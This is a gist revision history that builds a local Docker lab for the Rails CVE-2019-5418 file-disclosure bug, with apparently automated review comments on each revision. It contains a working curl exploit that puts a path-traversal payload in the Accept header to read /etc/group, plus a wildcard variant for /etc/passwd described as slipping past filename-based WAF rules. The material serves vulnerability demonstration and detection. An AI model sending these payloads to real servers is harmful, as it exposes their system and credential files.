Revisions
ajxchapman revised this gist
Mar 30, 2019. 1 changed file with 1 addition and 1 deletion.
@@ -37,7 +37,7 @@ bundle exec rails s -p 3000 -b '0.0.0.0' To demonstrate vulnerability ```sh curl -i -s -k -X $'GET' \ -H $'Host: 127.0.0.1:3000' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: .././.././.././.././.././.././.././.././.././.././e*c/./p*d{{' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Connection: close' \ $'http://127.0.0.1:3000/chybeta' ```
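Review bot: In the @@ -37,7 +37,7 @@ hunk the literal file path in the Accept header is swapped for the wildcard form `e*c/./p*d{{`, but the README text around the curl command is left unchanged, so a reader has no idea why a second variant exists. Add one sentence saying that this form is kept because a log or WAF rule that matches only the literal `etc/group` or `etc/passwd` string will not fire on it, and that detection should therefore key on the repeated `.././` traversal sequence appearing inside an Accept header, a value that is never a valid media type, rather than on the file name. The commit stats say 1 addition and 1 deletion, yet only the added line survives in this rendering; if both the `etc/./group{{` variant from the original gist and this one are meant to be demonstrated, list both in the README rather than overwriting one with the other.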
ajxchapman revised this gist
Mar 30, 2019. 1 changed file with 5 additions and 5 deletions.
@@ -26,7 +26,7 @@ Setup docker container ```sh docker build -t rails:CVE-2019-5418 . docker run -ti --rm -v `pwd`:/myapp -p 3000:3000 rails:CVE-2019-5418 /bin/bash git clone https://github.com/mpgn/CVE-2019-5418.git cd CVE-2019-5418/demo/ sed -i -e "s/^gem 'rails'.*/gem 'rails', '5.2.1'/" -e "s/^ruby '2.5.1'$/ruby '2.5.5'/" Gemfile bundle install @@ -41,7 +41,7 @@ curl -i -s -k -X $'GET' \ $'http://127.0.0.1:3000/chybeta' ``` ## Sources * https://github.com/mpgn/CVE-2019-5418 * https://docs.docker.com/compose/rails/ * https://stackoverflow.com/a/52979051
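Review bot: In the @@ -26,7 +26,7 @@ hunk, `docker run ... -p 3000:3000` publishes the intentionally vulnerable Rails app on every interface of the host, so anyone on the same network can reach the traversal demo while the container is up. Suggest `-p 127.0.0.1:3000:3000` so the published port is reachable only from the host itself; the `-b '0.0.0.0'` passed to `rails s` is still needed inside the container and is harmless once the port mapping is restricted. The `git clone` added in front of the repository URL is the right fix for the bare URL in the original, which the shell would otherwise try to execute as a command.

Review bot: In the @@ -41,7 +41,7 @@ hunk the source list drops `https://stackoverflow.com/a/54529016`, which the original gist listed as a third source, while adding the mpgn repository; if that answer is still relied on for any of the setup steps (the Gemfile `sed` edits or the `bundle update`), keep it in the list so a reader can trace where those steps came from. The change from `## Source` to `## Sources` with a bulleted list reads better than the bare URLs.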
ajxchapman created this gist
Mar 30, 2019.
@@ -0,0 +1,47 @@ # CVE-2019-5418 Demo Build Docker container: `Dockerfile` ```Dockerfile FROM ruby:2.5 RUN apt-get update -qq && apt-get install -y nodejs postgresql-client RUN mkdir /myapp WORKDIR /myapp COPY Gemfile /myapp/Gemfile COPY Gemfile.lock /myapp/Gemfile.lock RUN bundle install COPY . /myapp # Add a script to be executed every time the container starts. COPY entrypoint.sh /usr/bin/ RUN chmod +x /usr/bin/entrypoint.sh ENTRYPOINT ["entrypoint.sh"] EXPOSE 3000 # Start the main process. CMD ["rails", "server", "-b", "0.0.0.0"] ``` Setup docker container ```sh docker build -t rails:CVE-2019-5418 . docker run -ti --rm -v `pwd`:/myapp -p 3000:3000 rails:CVE-2019-5418 /bin/bash https://github.com/mpgn/CVE-2019-5418.git cd CVE-2019-5418/demo/ sed -i -e "s/^gem 'rails'.*/gem 'rails', '5.2.1'/" -e "s/^ruby '2.5.1'$/ruby '2.5.5'/" Gemfile bundle install bundle update bundle exec rails s -p 3000 -b '0.0.0.0' ``` To demonstrate vulnerability ```sh curl -i -s -k -X $'GET' \ -H $'Host: 127.0.0.1:3000' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: .././.././.././.././.././.././.././.././.././.././etc/./group{{' -H $'Accept-Language: en' -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Connection: close' \ $'http://127.0.0.1:3000/chybeta' ``` ## Source https://docs.docker.com/compose/rails/ https://stackoverflow.com/a/52979051 https://stackoverflow.com/a/54529016
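Review bot: In the setup block of @@ -0,0 +1,47 @@, the line `https://github.com/mpgn/CVE-2019-5418.git` is a bare URL rather than a command, so copying the block as written fails at that step, before `cd CVE-2019-5418/demo/`; it should read `git clone https://github.com/mpgn/CVE-2019-5418.git`. Two documentation gaps in the same hunk: the Dockerfile does `COPY Gemfile`, `COPY Gemfile.lock` and `COPY entrypoint.sh` from the build context, but the README never says which Gemfile, lock file and entrypoint script are expected to be present when `docker build` runs (the cloned repo's files only exist after the container is already started), and the `sed` pins `gem 'rails', '5.2.1'` without saying that this version is chosen because it is affected by CVE-2019-5418; a line naming the affected versions and the release that fixed the issue would make the purpose of the pin clear and tell a reader what a patched app looks like.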